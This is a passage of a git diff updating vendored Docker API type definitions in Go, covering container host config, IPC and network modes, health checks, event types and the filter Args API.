+// TaskListOptions holds parameters to list tasks with.
 type TaskListOptions struct {
 	Filters filters.Args
 }
@@ -356,15 +393,6 @@ type PluginInstallOptions struct {
 	Args                  []string
 }
 
-// SecretRequestOption is a type for requesting secrets
-type SecretRequestOption struct {
-	Source string
-	Target string
-	UID    string
-	GID    string
-	Mode   os.FileMode
-}
-
 // SwarmUnlockKeyResponse contains the response for Engine API:
 // GET /swarm/unlockkey
 type SwarmUnlockKeyResponse struct {
diff --git a/vendor/github.com/docker/docker/api/types/configs.go b/vendor/github.com/docker/docker/api/types/configs.go
index 20c19f2132..f6537a27f2 100644
--- a/vendor/github.com/docker/docker/api/types/configs.go
+++ b/vendor/github.com/docker/docker/api/types/configs.go
@@ -1,4 +1,4 @@
-package types
+package types // import "github.com/docker/docker/api/types"
 
 import (
 	"github.com/docker/docker/api/types/container"
@@ -25,19 +25,6 @@ type ContainerRmConfig struct {
 	ForceRemove, RemoveVolume, RemoveLink bool
 }
 
-// ContainerCommitConfig contains build configs for commit operation,
-// and is used when making a commit with the current state of the container.
-type ContainerCommitConfig struct {
-	Pause   bool
-	Repo    string
-	Tag     string
-	Author  string
-	Comment string
-	// merge container config into commit config before commit
-	MergeConfigs bool
-	Config       *container.Config
-}
-
 // ExecConfig is a small subset of the Config struct that holds the configuration
 // for the exec feature of docker.
 type ExecConfig struct {
@@ -50,6 +37,7 @@ type ExecConfig struct {
 	Detach       bool     // Execute in detach mode
 	DetachKeys   string   // Escape keys for detach
 	Env          []string // Environment variables
+	WorkingDir   string   // Working directory
 	Cmd          []string // Execution commands and args
 }
 
diff --git a/vendor/github.com/docker/docker/api/types/container/config.go b/vendor/github.com/docker/docker/api/types/container/config.go
index fc050e5dba..89ad08c234 100644
--- a/vendor/github.com/docker/docker/api/types/container/config.go
+++ b/vendor/github.com/docker/docker/api/types/container/config.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/api/types/container"
 
 import (
 	"time"
@@ -7,6 +7,12 @@ import (
 	"github.com/docker/go-connections/nat"
 )
 
+// MinimumDuration puts a minimum on user configured duration.
+// This is to prevent API error on time unit. For example, API may
+// set 3 as healthcheck interval with intention of 3 seconds, but
+// Docker interprets it as 3 nanoseconds.
+const MinimumDuration = 1 * time.Millisecond
+
 // HealthConfig holds configuration settings for the HEALTHCHECK feature.
 type HealthConfig struct {
 	// Test is the test to perform to check that the container is healthy.
@@ -19,8 +25,9 @@ type HealthConfig struct {
 	Test []string `json:",omitempty"`
 
 	// Zero means to inherit. Durations are expressed as integer nanoseconds.
-	Interval time.Duration `json:",omitempty"` // Interval is the time to wait between checks.
-	Timeout  time.Duration `json:",omitempty"` // Timeout is the time to wait before considering the check to have hung.
+	Interval    time.Duration `json:",omitempty"` // Interval is the time to wait between checks.
+	Timeout     time.Duration `json:",omitempty"` // Timeout is the time to wait before considering the check to have hung.
+	StartPeriod time.Duration `json:",omitempty"` // The start period for the container to initialize before the retries starts to count down.
 
 	// Retries is the number of consecutive failures needed to consider a container as unhealthy.
 	// Zero means inherit.
diff --git a/vendor/github.com/docker/docker/api/types/container/container_changes.go b/vendor/github.com/docker/docker/api/types/container/container_changes.go
new file mode 100644
index 0000000000..c909d6ca3e
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/container_changes.go
@@ -0,0 +1,21 @@
+package container
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/generate-swagger-api.sh
+// ----------------------------------------------------------------------------
+
+// ContainerChangeResponseItem change item in response to ContainerChanges operation
+// swagger:model ContainerChangeResponseItem
+type ContainerChangeResponseItem struct {
+
+	// Kind of change
+	// Required: true
+	Kind uint8 `json:"Kind"`
+
+	// Path to file that has changed
+	// Required: true
+	Path string `json:"Path"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/container_create.go b/vendor/github.com/docker/docker/api/types/container/container_create.go
index d028e3b121..49efa0f2c0 100644
--- a/vendor/github.com/docker/docker/api/types/container/container_create.go
+++ b/vendor/github.com/docker/docker/api/types/container/container_create.go
@@ -4,10 +4,10 @@ package container
 // DO NOT EDIT THIS FILE
 // This file was generated by `swagger generate operation`
 //
-// See hack/swagger-gen.sh
+// See hack/generate-swagger-api.sh
 // ----------------------------------------------------------------------------
 
-// ContainerCreateCreatedBody container create created body
+// ContainerCreateCreatedBody OK response to ContainerCreate operation
 // swagger:model ContainerCreateCreatedBody
 type ContainerCreateCreatedBody struct {
 
diff --git a/vendor/github.com/docker/docker/api/types/container/container_top.go b/vendor/github.com/docker/docker/api/types/container/container_top.go
new file mode 100644
index 0000000000..ba41edcf3f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/container_top.go
@@ -0,0 +1,21 @@
+package container
+
+// ----------------------------------------------------------------------------
+// DO NOT EDIT THIS FILE
+// This file was generated by `swagger generate operation`
+//
+// See hack/generate-swagger-api.sh
+// ----------------------------------------------------------------------------
+
+// ContainerTopOKBody OK response to ContainerTop operation
+// swagger:model ContainerTopOKBody
+type ContainerTopOKBody struct {
+
+	// Each process running in the container, where each is process is an array of values corresponding to the titles
+	// Required: true
+	Processes [][]string `json:"Processes"`
+
+	// The ps column titles
+	// Required: true
+	Titles []string `json:"Titles"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/container/container_update.go b/vendor/github.com/docker/docker/api/types/container/container_update.go
index 81ee12c678..7630ae54cd 100644
--- a/vendor/github.com/docker/docker/api/types/container/container_update.go
+++ b/vendor/github.com/docker/docker/api/types/container/container_update.go
@@ -4,10 +4,10 @@ package container
 // DO NOT EDIT THIS FILE
 // This file was generated by `swagger generate operation`
 //
-// See hack/swagger-gen.sh
+// See hack/generate-swagger-api.sh
 // ----------------------------------------------------------------------------
 
-// ContainerUpdateOKBody container update o k body
+// ContainerUpdateOKBody OK response to ContainerUpdate operation
 // swagger:model ContainerUpdateOKBody
 type ContainerUpdateOKBody struct {
 
diff --git a/vendor/github.com/docker/docker/api/types/container/container_wait.go b/vendor/github.com/docker/docker/api/types/container/container_wait.go
index 16cf335321..9e3910a6b4 100644
--- a/vendor/github.com/docker/docker/api/types/container/container_wait.go
+++ b/vendor/github.com/docker/docker/api/types/container/container_wait.go
@@ -4,13 +4,25 @@ package container
 // DO NOT EDIT THIS FILE
 // This file was generated by `swagger generate operation`
 //
-// See hack/swagger-gen.sh
+// See hack/generate-swagger-api.sh
 // ----------------------------------------------------------------------------
 
-// ContainerWaitOKBody container wait o k body
+// ContainerWaitOKBodyError container waiting error, if any
+// swagger:model ContainerWaitOKBodyError
+type ContainerWaitOKBodyError struct {
+
+	// Details of an error
+	Message string `json:"Message,omitempty"`
+}
+
+// ContainerWaitOKBody OK response to ContainerWait operation
 // swagger:model ContainerWaitOKBody
 type ContainerWaitOKBody struct {
 
+	// error
+	// Required: true
+	Error *ContainerWaitOKBodyError `json:"Error"`
+
 	// Exit code of the container
 	// Required: true
 	StatusCode int64 `json:"StatusCode"`
diff --git a/vendor/github.com/docker/docker/api/types/container/host_config.go b/vendor/github.com/docker/docker/api/types/container/host_config.go
index 0c82d625e8..4ef26fa6c8 100644
--- a/vendor/github.com/docker/docker/api/types/container/host_config.go
+++ b/vendor/github.com/docker/docker/api/types/container/host_config.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/api/types/container"
 
 import (
 	"strings"
@@ -10,9 +10,6 @@ import (
 	"github.com/docker/go-units"
 )
 
-// NetworkMode represents the container network stack.
-type NetworkMode string
-
 // Isolation represents the isolation technology of a container. The supported
 // values are platform specific
 type Isolation string
@@ -23,42 +20,101 @@ func (i Isolation) IsDefault() bool {
 	return strings.ToLower(string(i)) == "default" || string(i) == ""
 }
 
+// IsHyperV indicates the use of a Hyper-V partition for isolation
+func (i Isolation) IsHyperV() bool {
+	return strings.ToLower(string(i)) == "hyperv"
+}
+
+// IsProcess indicates the use of process isolation
+func (i Isolation) IsProcess() bool {
+	return strings.ToLower(string(i)) == "process"
+}
+
+const (
+	// IsolationEmpty is unspecified (same behavior as default)
+	IsolationEmpty = Isolation("")
+	// IsolationDefault is the default isolation mode on current daemon
+	IsolationDefault = Isolation("default")
+	// IsolationProcess is process isolation mode
+	IsolationProcess = Isolation("process")
+	// IsolationHyperV is HyperV isolation mode
+	IsolationHyperV = Isolation("hyperv")
+)
+
 // IpcMode represents the container ipc stack.
 type IpcMode string
 
-// IsPrivate indicates whether the container uses its private ipc stack.
+// IsPrivate indicates whether the container uses its own private ipc namespace which can not be shared.
 func (n IpcMode) IsPrivate() bool {
-	return !(n.IsHost() || n.IsContainer())
+	return n == "private"
 }
 
-// IsHost indicates whether the container uses the host's ipc stack.
+// IsHost indicates whether the container shares the host's ipc namespace.
 func (n IpcMode) IsHost() bool {
 	return n == "host"
 }
 
-// IsContainer indicates whether the container uses a container's ipc stack.
+// IsShareable indicates whether the container's ipc namespace can be shared with another container.
+func (n IpcMode) IsShareable() bool {
+	return n == "shareable"
+}
+
+// IsContainer indicates whether the container uses another container's ipc namespace.
 func (n IpcMode) IsContainer() bool {
 	parts := strings.SplitN(string(n), ":", 2)
 	return len(parts) > 1 && parts[0] == "container"
 }
 
-// Valid indicates whether the ipc stack is valid.
+// IsNone indicates whether container IpcMode is set to "none".
+func (n IpcMode) IsNone() bool {
+	return n == "none"
+}
+
+// IsEmpty indicates whether container IpcMode is empty
+func (n IpcMode) IsEmpty() bool {
+	return n == ""
+}
+
+// Valid indicates whether the ipc mode is valid.
 func (n IpcMode) Valid() bool {
-	parts := strings.Split(string(n), ":")
-	switch mode := parts[0]; mode {
-	case "", "host":
-	case "container":
-		if len(parts) != 2 || parts[1] == "" {
-			return false
-		}
-	default:
-		return false
-	}
-	return true
+	return n.IsEmpty() || n.IsNone() || n.IsPrivate() || n.IsHost() || n.IsShareable() || n.IsContainer()
 }
 
 // Container returns the name of the container ipc stack is going to be used.
 func (n IpcMode) Container() string {
+	parts := strings.SplitN(string(n), ":", 2)
+	if len(parts) > 1 && parts[0] == "container" {
+		return parts[1]
+	}
+	return ""
+}
+
+// NetworkMode represents the container network stack.
+type NetworkMode string
+
+// IsNone indicates whether container isn't using a network stack.
+func (n NetworkMode) IsNone() bool {
+	return n == "none"
+}
+
+// IsDefault indicates whether container uses the default network stack.
+func (n NetworkMode) IsDefault() bool {
+	return n == "default"
+}
+
+// IsPrivate indicates whether container uses its private network stack.
+func (n NetworkMode) IsPrivate() bool {
+	return !(n.IsHost() || n.IsContainer())
+}
+
+// IsContainer indicates whether container uses a container network stack.
+func (n NetworkMode) IsContainer() bool {
+	parts := strings.SplitN(string(n), ":", 2)
+	return len(parts) > 1 && parts[0] == "container"
+}
+
+// ConnectedContainer is the id of the container which network this container is connected to.
+func (n NetworkMode) ConnectedContainer() string {
 	parts := strings.SplitN(string(n), ":", 2)
 	if len(parts) > 1 {
 		return parts[1]
@@ -66,6 +122,14 @@ func (n IpcMode) Container() string {
 	return ""
 }
 
+//UserDefined indicates user-created network
+func (n NetworkMode) UserDefined() string {
+	if n.IsUserDefined() {
+		return string(n)
+	}
+	return ""
+}
+
 // UsernsMode represents userns mode in the container.
 type UsernsMode string
 
@@ -223,6 +287,17 @@ func (rp *RestartPolicy) IsSame(tp *RestartPolicy) bool {
 	return rp.Name == tp.Name && rp.MaximumRetryCount == tp.MaximumRetryCount
 }
 
+// LogMode is a type to define the available modes for logging
+// These modes affect how logs are handled when log messages start piling up.
+type LogMode string
+
+// Available logging modes
+const (
+	LogModeUnset            = ""
+	LogModeBlocking LogMode = "blocking"
+	LogModeNonBlock LogMode = "non-blocking"
+)
+
 // LogConfig represents the logging configuration of the container.
 type LogConfig struct {
 	Type   string
@@ -251,6 +326,7 @@ type Resources struct {
 	CpusetCpus           string          // CpusetCpus 0-2, 0,1
 	CpusetMems           string          // CpusetMems 0-2, 0,1
 	Devices              []DeviceMapping // List of devices to map inside the container
+	DeviceCgroupRules    []string        // List of rule to be added to the device cgroup
 	DiskQuota            int64           // Disk limit (in bytes)
 	KernelMemory         int64           // Kernel memory limit (in bytes)
 	MemoryReservation    int64           // Memory soft limit (in bytes)
@@ -317,7 +393,7 @@ type HostConfig struct {
 
 	// Applicable to Windows
 	ConsoleSize [2]uint   // Initial console size (height,width)
-	Isolation   Isolation // Isolation technology of the container (eg default, hyperv)
+	Isolation   Isolation // Isolation technology of the container (e.g. default, hyperv)
 
 	// Contains container's resources (cgroups, ulimits)
 	Resources
@@ -325,9 +401,12 @@ type HostConfig struct {
 	// Mounts specs used by the container
 	Mounts []mount.Mount `json:",omitempty"`
 
+	// MaskedPaths is the list of paths to be masked inside the container (this overrides the default set of paths)
+	MaskedPaths []string
+
+	// ReadonlyPaths is the list of paths to be set as read-only inside the container (this overrides the default set of paths)
+	ReadonlyPaths []string
+
 	// Run a custom init inside the container, if null, use the daemon's configured settings
 	Init *bool `json:",omitempty"`
-
-	// Custom init path
-	InitPath string `json:",omitempty"`
 }
diff --git a/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go b/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go
index 9fb79bed6f..cf6fdf4402 100644
--- a/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go
+++ b/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go
@@ -1,24 +1,12 @@
 // +build !windows
 
-package container
-
-import "strings"
+package container // import "github.com/docker/docker/api/types/container"
 
 // IsValid indicates if an isolation technology is valid
 func (i Isolation) IsValid() bool {
 	return i.IsDefault()
 }
 
-// IsPrivate indicates whether container uses its private network stack.
-func (n NetworkMode) IsPrivate() bool {
-	return !(n.IsHost() || n.IsContainer())
-}
-
-// IsDefault indicates whether container uses the default network stack.
-func (n NetworkMode) IsDefault() bool {
-	return n == "default"
-}
-
 // NetworkName returns the name of the network stack.
 func (n NetworkMode) NetworkName() string {
 	if n.IsBridge() {
@@ -47,35 +35,7 @@ func (n NetworkMode) IsHost() bool {
 	return n == "host"
 }
 
-// IsContainer indicates whether container uses a container network stack.
-func (n NetworkMode) IsContainer() bool {
-	parts := strings.SplitN(string(n), ":", 2)
-	return len(parts) > 1 && parts[0] == "container"
-}
-
-// IsNone indicates whether container isn't using a network stack.
-func (n NetworkMode) IsNone() bool {
-	return n == "none"
-}
-
-// ConnectedContainer is the id of the container which network this container is connected to.
-func (n NetworkMode) ConnectedContainer() string {
-	parts := strings.SplitN(string(n), ":", 2)
-	if len(parts) > 1 {
-		return parts[1]
-	}
-	return ""
-}
-
 // IsUserDefined indicates user-created network
 func (n NetworkMode) IsUserDefined() bool {
 	return !n.IsDefault() && !n.IsBridge() && !n.IsHost() && !n.IsNone() && !n.IsContainer()
 }
-
-//UserDefined indicates user-created network
-func (n NetworkMode) UserDefined() string {
-	if n.IsUserDefined() {
-		return string(n)
-	}
-	return ""
-}
diff --git a/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go b/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go
index 0ee332ba68..99f803a5bb 100644
--- a/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go
+++ b/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go
@@ -1,24 +1,4 @@
-package container
-
-import (
-	"strings"
-)
-
-// IsDefault indicates whether container uses the default network stack.
-func (n NetworkMode) IsDefault() bool {
-	return n == "default"
-}
-
-// IsNone indicates whether container isn't using a network stack.
-func (n NetworkMode) IsNone() bool {
-	return n == "none"
-}
-
-// IsContainer indicates whether container uses a container network stack.
-// Returns false as windows doesn't support this mode
-func (n NetworkMode) IsContainer() bool {
-	return false
-}
+package container // import "github.com/docker/docker/api/types/container"
 
 // IsBridge indicates whether container uses the bridge network stack
 // in windows it is given the name NAT
@@ -32,30 +12,9 @@ func (n NetworkMode) IsHost() bool {
 	return false
 }
 
-// IsPrivate indicates whether container uses its private network stack.
-func (n NetworkMode) IsPrivate() bool {
-	return !(n.IsHost() || n.IsContainer())
-}
-
-// ConnectedContainer is the id of the container which network this container is connected to.
-// Returns blank string on windows
-func (n NetworkMode) ConnectedContainer() string {
-	return ""
-}
-
 // IsUserDefined indicates user-created network
 func (n NetworkMode) IsUserDefined() bool {
-	return !n.IsDefault() && !n.IsNone() && !n.IsBridge()
-}
-
-// IsHyperV indicates the use of a Hyper-V partition for isolation
-func (i Isolation) IsHyperV() bool {
-	return strings.ToLower(string(i)) == "hyperv"
-}
-
-// IsProcess indicates the use of process isolation
-func (i Isolation) IsProcess() bool {
-	return strings.ToLower(string(i)) == "process"
+	return !n.IsDefault() && !n.IsNone() && !n.IsBridge() && !n.IsContainer()
 }
 
 // IsValid indicates if an isolation technology is valid
@@ -71,17 +30,11 @@ func (n NetworkMode) NetworkName() string {
 		return "nat"
 	} else if n.IsNone() {
 		return "none"
+	} else if n.IsContainer() {
+		return "container"
 	} else if n.IsUserDefined() {
 		return n.UserDefined()
 	}
 
 	return ""
 }
-
-//UserDefined indicates user-created network
-func (n NetworkMode) UserDefined() string {
-	if n.IsUserDefined() {
-		return string(n)
-	}
-	return ""
-}
diff --git a/vendor/github.com/docker/docker/api/types/container/waitcondition.go b/vendor/github.com/docker/docker/api/types/container/waitcondition.go
new file mode 100644
index 0000000000..cd8311f99c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/container/waitcondition.go
@@ -0,0 +1,22 @@
+package container // import "github.com/docker/docker/api/types/container"
+
+// WaitCondition is a type used to specify a container state for which
+// to wait.
+type WaitCondition string
+
+// Possible WaitCondition Values.
+//
+// WaitConditionNotRunning (default) is used to wait for any of the non-running
+// states: "created", "exited", "dead", "removing", or "removed".
+//
+// WaitConditionNextExit is used to wait for the next time the state changes
+// to a non-running state. If the state is currently "created" or "exited",
+// this would cause Wait() to block until either the container runs and exits
+// or is removed.
+//
+// WaitConditionRemoved is used to wait for the container to be removed.
+const (
+	WaitConditionNotRunning WaitCondition = "not-running"
+	WaitConditionNextExit   WaitCondition = "next-exit"
+	WaitConditionRemoved    WaitCondition = "removed"
+)
diff --git a/vendor/github.com/docker/docker/api/types/events/events.go b/vendor/github.com/docker/docker/api/types/events/events.go
index 7129a65acf..027c6edb72 100644
--- a/vendor/github.com/docker/docker/api/types/events/events.go
+++ b/vendor/github.com/docker/docker/api/types/events/events.go
@@ -1,4 +1,4 @@
-package events
+package events // import "github.com/docker/docker/api/types/events"
 
 const (
 	// ContainerEventType is the event type that containers generate
@@ -13,6 +13,14 @@ const (
 	PluginEventType = "plugin"
 	// VolumeEventType is the event type that volumes generate
 	VolumeEventType = "volume"
+	// ServiceEventType is the event type that services generate
+	ServiceEventType = "service"
+	// NodeEventType is the event type that nodes generate
+	NodeEventType = "node"
+	// SecretEventType is the event type that secrets generate
+	SecretEventType = "secret"
+	// ConfigEventType is the event type that configs generate
+	ConfigEventType = "config"
 )
 
 // Actor describes something that generates events,
@@ -36,6 +44,8 @@ type Message struct {
 	Type   string
 	Action string
 	Actor  Actor
+	// Engine events are local scope. Cluster events are swarm scope.
+	Scope string `json:"scope,omitempty"`
 
 	Time     int64 `json:"time,omitempty"`
 	TimeNano int64 `json:"timeNano,omitempty"`
diff --git a/vendor/github.com/docker/docker/api/types/filters/example_test.go b/vendor/github.com/docker/docker/api/types/filters/example_test.go
new file mode 100644
index 0000000000..c8fec1b9d8
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/filters/example_test.go
@@ -0,0 +1,24 @@
+package filters // import "github.com/docker/docker/api/types/filters"
+
+func ExampleArgs_MatchKVList() {
+	args := NewArgs(
+		Arg("label", "image=foo"),
+		Arg("label", "state=running"))
+
+	// returns true because there are no values for bogus
+	args.MatchKVList("bogus", nil)
+
+	// returns false because there are no sources
+	args.MatchKVList("label", nil)
+
+	// returns true because all sources are matched
+	args.MatchKVList("label", map[string]string{
+		"image": "foo",
+		"state": "running",
+	})
+
+	// returns false because the values do not match
+	args.MatchKVList("label", map[string]string{
+		"image": "other",
+	})
+}
diff --git a/vendor/github.com/docker/docker/api/types/filters/parse.go b/vendor/github.com/docker/docker/api/types/filters/parse.go
index e01a41deb8..a41e3d8d96 100644
--- a/vendor/github.com/docker/docker/api/types/filters/parse.go
+++ b/vendor/github.com/docker/docker/api/types/filters/parse.go
@@ -1,38 +1,45 @@
-// Package filters provides helper function to parse and handle command line
-// filter, used for example in docker ps or docker images commands.
-package filters
+/*Package filters provides tools for encoding a mapping of keys to a set of
+multiple values.
+*/
+package filters // import "github.com/docker/docker/api/types/filters"
 
 import (
 	"encoding/json"
 	"errors"
-	"fmt"
 	"regexp"
 	"strings"
 
 	"github.com/docker/docker/api/types/versions"
 )
 
-// Args stores filter arguments as map key:{map key: bool}.
-// It contains an aggregation of the map of arguments (which are in the form
-// of -f 'key=value') based on the key, and stores values for the same key
-// in a map with string keys and boolean values.
-// e.g given -f 'label=label1=1' -f 'label=label2=2' -f 'image.name=ubuntu'
-// the args will be {"image.name":{"ubuntu":true},"label":{"label1=1":true,"label2=2":true}}
+// Args stores a mapping of keys to a set of multiple values.
 type Args struct {
 	fields map[string]map[string]bool
 }
 
-// NewArgs initializes a new Args struct.
-func NewArgs() Args {
-	return Args{fields: map[string]map[string]bool{}}
+// KeyValuePair are used to initialize a new Args
+type KeyValuePair struct {
+	Key   string
+	Value string
 }
 
-// ParseFlag parses the argument to the filter flag. Like
-//
-//   `docker ps -f 'created=today' -f 'image.name=ubuntu*'`
+// Arg creates a new KeyValuePair for initializing Args
+func Arg(key, value string) KeyValuePair {
+	return KeyValuePair{Key: key, Value: value}
+}
+
+// NewArgs returns a new Args populated with the initial args
+func NewArgs(initialArgs ...KeyValuePair) Args {
+	args := Args{fields: map[string]map[string]bool{}}
+	for _, arg := range initialArgs {
+		args.Add(arg.Key, arg.Value)
+	}
+	return args
+}
+
+// ParseFlag parses a key=value string and adds it to an Args.
 //
-// If prev map is provided, then it is appended to, and returned. By default a new
-// map is created.
+// Deprecated: Use Args.Add()
 func ParseFlag(arg string, prev Args) (Args, error) {
 	filters := prev
 	if len(arg) == 0 {
@@ -53,74 +60,95 @@ func ParseFlag(arg string, prev Args) (Args, error) {
 	return filters, nil
 }
 
-// ErrBadFormat is an error returned in case of bad format for a filter.
+// ErrBadFormat is an error returned when a filter is not in the form key=value
+//
+// Deprecated: this error will be removed in a future version
 var ErrBadFormat = errors.New("bad format of filter (expected name=value)")
 
-// ToParam packs the Args into a string for easy transport from client to server.
+// ToParam encodes the Args as args JSON encoded string
+//
+// Deprecated: use ToJSON
 func ToParam(a Args) (string, error) {
-	// this way we don't URL encode {}, just empty space
-	if a.Len() == 0 {
-		return "", nil
+	return ToJSON(a)
+}
+
+// MarshalJSON returns a JSON byte representation of the Args
+func (args Args) MarshalJSON() ([]byte, error) {
+	if len(args.fields) == 0 {
+		return []byte{}, nil
 	}
+	return json.Marshal(args.fields)
+}
 
-	buf, err := json.Marshal(a.fields)
-	if err != nil {
-		return "", err
+// ToJSON returns the Args as a JSON encoded string
+func ToJSON(a Args) (string, error) {
+	if a.Len() == 0 {
+		return "", nil
 	}
-	return string(buf), nil
+	buf, err := json.Marshal(a)
+	return string(buf), err
 }
 
-// ToParamWithVersion packs the Args into a string for easy transport from client to server.
-// The generated string will depend on the specified version (corresponding to the API version).
+// ToParamWithVersion encodes Args as a JSON string. If version is less than 1.22
+// then the encoded format will use an older legacy format where the values are a
+// list of strings, instead of a set.
+//
+// Deprecated: Use ToJSON
 func ToParamWithVersion(version string, a Args) (string, error) {
-	// this way we don't URL encode {}, just empty space
 	if a.Len() == 0 {
 		return "", nil
 	}
 
-	// for daemons older than v1.10, filter must be of the form map[string][]string
-	buf := []byte{}
-	err := errors.New("")
 	if version != "" && versions.LessThan(version, "1.22") {
-		buf, err = json.Marshal(convertArgsToSlice(a.fields))
-	} else {
-		buf, err = json.Marshal(a.fields)
-	}
-	if err != nil {
-		return "", err
+		buf, err := json.Marshal(convertArgsToSlice(a.fields))
+		return string(buf), err
 	}
-	return string(buf), nil
+
+	return ToJSON(a)
 }
 
-// FromParam unpacks the filter Args.
+// FromParam decodes a JSON encoded string into Args
+//
+// Deprecated: use FromJSON
 func FromParam(p string) (Args, error) {
-	if len(p) == 0 {
-		return NewArgs(), nil
+	return FromJSON(p)
+}
+
+// FromJSON decodes a JSON encoded string into Args
+func FromJSON(p string) (Args, error) {
+	args := NewArgs()
+
+	if p == "" {
+		return args, nil
 	}
 
-	r := strings.NewReader(p)
-	d := json.NewDecoder(r)
+	raw := []byte(p)
+	err := json.Unmarshal(raw, &args)
+	if err == nil {
+		return args, nil
+	}
 
-	m := map[string]map[string]bool{}
-	if err := d.Decode(&m); err != nil {
-		r.Seek(0, 0)
-
-		// Allow parsing old arguments in slice format.
-		// Because other libraries might be sending them in this format.
-		deprecated := map[string][]string{}
-		if deprecatedErr := d.Decode(&deprecated); deprecatedErr == nil {
-			m = deprecatedArgs(deprecated)
-		} else {
-			return NewArgs(), err
-		}
+	// Fallback to parsing arguments in the legacy slice format
+	deprecated := map[string][]string{}
+	if legacyErr := json.Unmarshal(raw, &deprecated); legacyErr != nil {
+		return args, err
+	}
+
+	args.fields = deprecatedArgs(deprecated)
+	return args, nil
+}
+
+// UnmarshalJSON populates the Args from JSON encode bytes
+func (args Args) UnmarshalJSON(raw []byte) error {
+	if len(raw) == 0 {
+		return nil
 	}
-	return Args{m}, nil
+	return json.Unmarshal(raw, &args.fields)
 }
 
-// Get returns the list of values associates with a field.
-// It returns a slice of strings to keep backwards compatibility with old code.
-func (filters Args) Get(field string) []string {
-	values := filters.fields[field]
+// Get returns the list of values associated with the key
+func (args Args) Get(key string) []string {
+	values := args.fields[key]
 	if values == nil {
 		return make([]string, 0)
 	}
@@ -131,37 +159,34 @@ func (filters Args) Get(field string) []string {
 	return slice
 }
 
-// Add adds a new value to a filter field.
-func (filters Args) Add(name, value string) {
-	if _, ok := filters.fields[name]; ok {
-		filters.fields[name][value] = true
+// Add a new value to the set of values
+func (args Args) Add(key, value string) {
+	if _, ok := args.fields[key]; ok {
+		args.fields[key][value] = true
 	} else {
-		filters.fields[name] = map[string]bool{value: true}
+		args.fields[key] = map[string]bool{value: true}
 	}
 }
 
-// Del removes a value from a filter field.
-func (filters Args) Del(name, value string) {
-	if _, ok := filters.fields[name]; ok {
-		delete(filters.fields[name], value)
-		if len(filters.fields[name]) == 0 {
-			delete(filters.fields, name)
+// Del removes a value from the set
+func (args Args) Del(key, value string) {
+	if _, ok := args.fields[key]; ok {
+		delete(args.fields[key], value)
+		if len(args.fields[key]) == 0 {
+			delete(args.fields, key)
 		}
 	}
 }
 
-// Len returns the number of fields in the arguments.
-func (filters Args) Len() int {
-	return len(filters.fields)
+// Len returns the number of keys in the mapping
+func (args Args) Len() int {
+	return len(args.fields)
 }
 
-// MatchKVList returns true if the values for the specified field matches the ones
-// from the sources.
-// e.g. given Args are {'label': {'label1=1','label2=1'}, 'image.name', {'ubuntu'}},
-//      field is 'label' and sources are {'label1': '1', 'label2': '2'}
-//      it returns true.
-func (filters Args) MatchKVList(field string, sources map[string]string) bool {
-	fieldValues := filters.fields[field]
+// MatchKVList returns true if all the pairs in sources exist as key=value
+// pairs in the mapping at key, or if there are no values at key.
+func (args Args) MatchKVList(key string, sources map[string]string) bool {
+	fieldValues := args.fields[key]
 
 	//do not filter if there is no filter set or cannot determine filter
 	if len(fieldValues) == 0 {
@@ -172,8 +197,8 @@ func (filters Args) MatchKVList(field string, sources map[string]string) bool {
 		return false
 	}
 
-	for name2match := range fieldValues {
-		testKV := strings.SplitN(name2match, "=", 2)
+	for value := range fieldValues {
+		testKV := strings.SplitN(value, "=", 2)
 
 		v, ok := sources[testKV[0]]
 		if !ok {
@@ -187,16 +212,13 @@ func (filters Args) MatchKVList(field string, sources map[string]string) bool {
 	return true
 }
 
-// Match returns true if the values for the specified field matches the source string
-// e.g. given Args are {'label': {'label1=1','label2=1'}, 'image.name', {'ubuntu'}},
-//      field is 'image.name' and source is 'ubuntu'
-//      it returns true.
-func (filters Args) Match(field, source string) bool {
-	if filters.ExactMatch(field, source) {
+// Match returns true if any of the values at key match the source string
+func (args Args) Match(field, source string) bool {
+	if args.ExactMatch(field, source) {
 		return true
 	}
 
-	fieldValues := filters.fields[field]
+	fieldValues := args.fields[field]
 	for name2match := range fieldValues {
 		match, err := regexp.MatchString(name2match, source)
 		if err != nil {
@@ -209,9 +231,9 @@ func (filters Args) Match(field, source string) bool {
 	return false
 }
 
-// ExactMatch returns true if the source matches exactly one of the filters.
-func (filters Args) ExactMatch(field, source string) bool {
-	fieldValues, ok := filters.fields[field]
+// ExactMatch returns true if the source matches exactly one of the values.
+func (args Args) ExactMatch(key, source string) bool {
+	fieldValues, ok := args.fields[key]
 	//do not filter if there is no filter set or cannot determine filter
 	if !ok || len(fieldValues) == 0 {
 		return true
@@ -221,14 +243,15 @@ func (filters Args) ExactMatch(field, source string) bool {
 	return fieldValues[source]
 }
 
-// UniqueExactMatch returns true if there is only one filter and the source matches exactly this one.
-func (filters Args) UniqueExactMatch(field, source string) bool {
-	fieldValues := filters.fields[field]
+// UniqueExactMatch returns true if there is only one value and the source
+// matches exactly the value.
+func (args Args) UniqueExactMatch(key, source string) bool {
+	fieldValues := args.fields[key]
 	//do not filter if there is no filter set or cannot determine filter
 	if len(fieldValues) == 0 {
 		return true
 	}
-	if len(filters.fields[field]) != 1 {
+	if len(args.fields[key]) != 1 {
 		return false
 	}
 
@@ -236,14 +259,14 @@ func (filters Args) UniqueExactMatch(field, source string) bool {
 	return fieldValues[source]
 }
 
-// FuzzyMatch returns true if the source matches exactly one of the filters,
-// or the source has one of the filters as a prefix.
-func (filters Args) FuzzyMatch(field, source string) bool {
-	if filters.ExactMatch(field, source) {
+// FuzzyMatch returns true if the source matches exactly one value,  or the
+// source has one of the values as a prefix.
